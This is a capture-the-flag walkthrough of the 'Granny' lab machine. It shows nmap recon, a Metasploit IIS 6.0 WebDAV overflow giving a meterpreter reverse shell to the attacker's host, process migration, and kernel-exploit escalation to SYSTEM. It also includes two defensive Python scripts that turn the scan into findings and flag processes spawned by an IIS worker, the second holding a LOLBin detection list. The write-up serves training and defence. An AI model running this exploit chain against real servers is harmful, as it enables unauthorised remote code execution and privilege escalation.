Granny

Introduction:
Granny is a Windows box and very similar to Grandpa in terms of the exploit and the privilege escalation. You exploit a known IIS 6.0 WebDAV CVE to gain initial access to the machine, migrate your process to a more stable one, and then use one of the many available local exploits to escalate privileges.
Recon
NMAP scan
nmap -sS -sC -sV -O -oN nmap.granny.txt 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 13:59 EST
Nmap scan report for 10.10.10.15
Host is up (0.013s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|   Server Date: Thu, 31 Dec 2020 19:07:33 GMT
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows XP SP2 or SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.43 seconds

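The scan already contains the two facts a defender cares about: the server is IIS 6.0, and it advertises the full WebDAV method set, including write-capable ones, to an anonymous client. The script below is an added example and not part of the original write-up; it parses the `-oN` output (the port 80 section is embedded as a constructed sample) and turns it into findings. The severity levels, the "out of support" version cut-off and the method groupings are assumptions chosen for the example.

```python
import re

# Constructed sample: the port-80 section of the nmap -oN output above, embedded so this runs offline.
NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
"""

# Methods that let a client create, change or rearrange server content.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
# Methods that only exist when WebDAV is switched on.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
# Assumption for this example: IIS major versions below 7 are treated as out of support.
MIN_SUPPORTED_IIS_MAJOR = 7

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")


def _methods(value, sep=None):
    """Split 'A, B, C' (sep=',') or 'A B C' (whitespace) into a set of upper-case method names."""
    return {m.strip().upper() for m in value.split(sep) if m.strip()}


def parse_nmap(text):
    """Map each open port to its version banner, Server header and the HTTP methods nmap saw."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current = f"{m.group(1)}/{m.group(2)}"
            ports[current] = {"service": m.group(3), "version": m.group(4).strip(),
                              "server_header": None, "risky": set(), "public": set(), "allowed": set()}
            continue
        if current is None:
            continue
        body = line.lstrip("|_ ").strip()          # drop the NSE script-output prefix
        key, _, value = body.partition(":")
        if key == "http-server-header":
            ports[current]["server_header"] = value.strip()
        elif key == "Potentially risky methods":
            ports[current]["risky"] = _methods(value)
        elif key == "Public Options":
            ports[current]["public"] = _methods(value, ",")
        elif key == "Allowed Methods":
            ports[current]["allowed"] = _methods(value, ",")
    return ports


def iis_major(server_header):
    """Major version from a 'Microsoft-IIS/6.0' header, or None if the server is not IIS."""
    m = re.search(r"Microsoft-IIS/(\d+)", server_header or "")
    return int(m.group(1)) if m else None


def assess(ports):
    """Turn parsed scan data into (port, severity, finding) tuples a defender can act on."""
    findings = []
    for port, p in sorted(ports.items()):
        # A method refused on one path may be honoured on another, so union all three sources.
        advertised = p["public"] | p["allowed"] | p["risky"]
        major = iis_major(p["server_header"])
        if major is not None and major < MIN_SUPPORTED_IIS_MAJOR:
            findings.append((port, "high", f"IIS {major}.x is out of support; no security fixes are available"))
        writes = advertised & WRITE_METHODS
        if writes:
            findings.append((port, "high", "write-capable WebDAV methods reachable: " + " ".join(sorted(writes))))
        elif advertised & WEBDAV_METHODS:
            findings.append((port, "medium", "WebDAV enabled; disable it unless the application needs it"))
        if "TRACE" in advertised:
            findings.append((port, "low", "TRACE method enabled"))
    return findings


if __name__ == "__main__":
    for port, sev, msg in assess(parse_nmap(NMAP_OUTPUT)):
        print(f"{port:<8} {sev:<6} {msg}")
```

Run as a script it reports three findings for 80/tcp: the unsupported server version, eight write-capable methods, and TRACE. Note that the Public Options line lists PUT while the Allowed Methods line does not; the parser keeps the three sources separate so the assessment can union them rather than trusting the most restrictive one.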
Enumeration
Search for possible vulnerabilities
# searchsploit webdav | grep -i iis | grep remote
Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow                                        | windows/remote/1.c
Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)                | windows/remote/41992.rb
Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)                           | windows/remote/16471.rb
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf       | windows/remote/22365.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf       | windows/remote/22366.c
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf       | windows/remote/22367.txt
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf       | windows/remote/22368.txt
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)              | windows/remote/16470.rb
Microsoft IIS 5.0 - WebDAV Remote                                                         | windows/remote/2.c
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)                              | windows/remote/51.c
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure                            | windows/remote/26230.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                  | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                               | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                               | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                           | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                             | windows/remote/8765.php

Exploit
Metasploit
msf6 > use windows/iis/iis_webdav_scstoragepathfromurl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.8         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86


msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set target 0
target => 0
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
RHOSTS => 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost tun0
lhost => tun0
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit

[*] Started reverse TCP handler on 10.10.14.25:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.25:4444 -> 10.10.10.15:1032) at 2020-12-31 14:03:30 -0500
meterpreter >
Post-exploit
Process migration
meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 196   1076  cidaemon.exe
 232   1076  cidaemon.exe
 276   4     smss.exe
 324   276   csrss.exe
 348   276   winlogon.exe
 396   348   services.exe
 408   348   lsass.exe
 616   396   svchost.exe
 680   396   svchost.exe
 740   396   svchost.exe
 772   396   svchost.exe
 800   396   svchost.exe
 936   396   spoolsv.exe
 964   396   msdtc.exe
 1076  396   cisvc.exe
 1124  396   svchost.exe
 1180  396   inetinfo.exe
 1216  396   svchost.exe
 1332  396   VGAuthService.exe
 1424  396   vmtoolsd.exe
 1476  396   svchost.exe
 1620  396   svchost.exe
 1752  396   alg.exe
 1824  616   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1916  396   dllhost.exe
 2268  348   logon.scr
 2316  616   wmiprvse.exe
 2552  1476  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2752  616   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3404  800   HelpSvc.exe
 3592  2552  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 4064  1076  cidaemon.exe

meterpreter > migrate 1824
[*] Migrating from 3592 to 1824...
[*] Migration completed successfully.
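The listing shows why migration matters from both sides. The session lives in rundll32.exe (PID 3592), whose parent is the IIS worker w3wp.exe (PID 2552): a web server worker spawning a program like rundll32.exe is the classic indicator of code execution inside the web application, and after `migrate 1824` the same payload sits inside wmiprvse.exe under svchost.exe, where a process-tree rule no longer sees anything odd. The script below is an added example and not part of the original write-up; it parses an excerpt of the `ps` table (constructed from the listing above) and flags every process spawned by an IIS worker. The worker and child name lists are assumptions to tune per environment.

```python
import re

# Constructed excerpt of the meterpreter `ps` listing above; rows without Arch/User/Path are processes
# the NETWORK SERVICE session could not inspect, exactly as in the original output.
PS_OUTPUT = r"""
 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 276   4     smss.exe
 348   276   winlogon.exe
 396   348   services.exe
 616   396   svchost.exe
 1180  396   inetinfo.exe
 1476  396   svchost.exe
 1824  616   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2552  1476  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2752  616   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3592  2552  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
"""

# One table row: PID PPID Name, optionally followed by Arch Session [User] Path. The user field may
# contain spaces ("NT AUTHORITY\NETWORK SERVICE"), so it is delimited by the drive-letter path after it.
ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>.+?)"
    r"(?:\s+(?P<arch>x86|x64)\s+(?P<session>\d+)\s+(?:(?P<user>.+?)\s+)?(?P<path>[A-Za-z]:\\.*?))?\s*$"
)

# Processes that serve IIS content; none of them should spawn interactive or scripting children.
WEB_WORKERS = {"w3wp.exe", "inetinfo.exe", "davcdata.exe"}
# Children that almost always mean code execution inside the web server (assumption: tune per environment).
LOLBIN_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
                   "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe"}


def parse_ps(text):
    """Parse the table into {pid: {pid, ppid, name, user, path}}, skipping header and separator rows."""
    procs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        procs[int(m["pid"])] = {
            "pid": int(m["pid"]), "ppid": int(m["ppid"]), "name": m["name"].strip(),
            "user": (m["user"] or "").strip() or None, "path": m["path"],
        }
    return procs


def ancestry(procs, pid):
    """Process names from pid up to the root, e.g. ['rundll32.exe', 'w3wp.exe', 'svchost.exe', ...]."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:      # `seen` stops the 0 -> 0 self-loop at the root
        seen.add(pid)
        chain.append(procs[pid]["name"])
        pid = procs[pid]["ppid"]
    return chain


def find_web_spawned(procs):
    """Return (severity, pid, chain) for every process whose parent is an IIS worker."""
    alerts = []
    for p in procs.values():
        parent = procs.get(p["ppid"])
        if parent is None or parent["name"].lower() not in WEB_WORKERS:
            continue
        severity = "high" if p["name"].lower() in LOLBIN_CHILDREN else "medium"
        alerts.append((severity, p["pid"], " <- ".join(ancestry(procs, p["pid"]))))
    return alerts


if __name__ == "__main__":
    for severity, pid, chain in find_web_spawned(parse_ps(PS_OUTPUT)):
        print(f"[{severity}] pid {pid}: {chain}")
```

Against the excerpt it raises one high-severity alert, `rundll32.exe <- w3wp.exe <- svchost.exe <- services.exe ...`. That initial spawn is the moment process-creation telemetry (Sysmon Event ID 1, or the equivalent from an EDR) has the best chance of catching the foothold; once the payload has migrated into wmiprvse.exe the parent-child relationship is unremarkable, and only the outbound connection on port 4444 or an in-memory scan of that process is left to find it.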
Exploit Suggester
meterpreter > sysinfo
Computer        : GRANNY
OS              : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggster
[-] No results from search
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
msf6 post(multi/recon/local_exploit_suggester) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\NETWORK SERVICE @ GRANNY  10.10.14.25:4444 -> 10.10.10.15:1032 (10.10.10.15)

msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 35 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options

Module options (exploit/windows/local/ms14_070_tcpip_ioctl):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.8         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2003 SP2


msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lport 4455
lport => 4455
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set target 0
target => 0
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.25:4455
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.25:4455 -> 10.10.10.15:1035) at 2020-12-31 14:08:46 -0500

meterpreter > shell
Process 3272 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>getuid
getuid
'getuid' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>whoami
whoami
nt authority\system
Extract user and root flags
root flag
C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\

04/12/2017  04:27 PM    <DIR>          ADFS
04/12/2017  04:04 PM                 0 AUTOEXEC.BAT
04/12/2017  04:04 PM                 0 CONFIG.SYS
04/12/2017  09:19 PM    <DIR>          Documents and Settings
04/12/2017  04:17 PM    <DIR>          FPSE_search
04/12/2017  04:17 PM    <DIR>          Inetpub
12/24/2017  07:21 PM    <DIR>          Program Files
12/24/2017  07:30 PM    <DIR>          WINDOWS
04/12/2017  04:05 PM    <DIR>          wmpub
               2 File(s)              0 bytes
               7 Dir(s)  18,092,761,088 bytes free

C:\>cd Documents and Settings
cd Documents and Settings

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  09:19 PM    <DIR>          .
04/12/2017  09:19 PM    <DIR>          ..
04/12/2017  08:48 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  09:19 PM    <DIR>          Lakis
               0 File(s)              0 bytes
               5 Dir(s)  18,092,756,992 bytes free

C:\Documents and Settings>cd Administrator
cd Administrator

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
aaXXXXXXXXXXXXXXXXXXXXXXXXXXX6e9

user flag
(C) Copyright 1985-2003 Microsoft Corp.

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\

04/12/2017  04:27 PM    <DIR>          ADFS
04/12/2017  04:04 PM                 0 AUTOEXEC.BAT
04/12/2017  04:04 PM                 0 CONFIG.SYS
04/12/2017  09:19 PM    <DIR>          Documents and Settings
04/12/2017  04:17 PM    <DIR>          FPSE_search
04/12/2017  04:17 PM    <DIR>          Inetpub
12/24/2017  07:21 PM    <DIR>          Program Files
12/24/2017  07:30 PM    <DIR>          WINDOWS
04/12/2017  04:05 PM    <DIR>          wmpub
               2 File(s)              0 bytes
               7 Dir(s)  18,092,752,896 bytes free

C:\>cd Documents and Settings
cd Documents and Settings

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  09:19 PM    <DIR>          .
04/12/2017  09:19 PM    <DIR>          ..
04/12/2017  08:48 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  09:19 PM    <DIR>          Lakis
               0 File(s)              0 bytes
               5 Dir(s)  18,092,752,896 bytes free

C:\Documents and Settings>cd Lakis\Desktop
cd Lakis\Desktop

C:\Documents and Settings\Lakis\Desktop>type user.txt
type user.txt
70XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd1
C:\Documents and Settings\Lakis\Desktop>
meterpreter >
Notes: None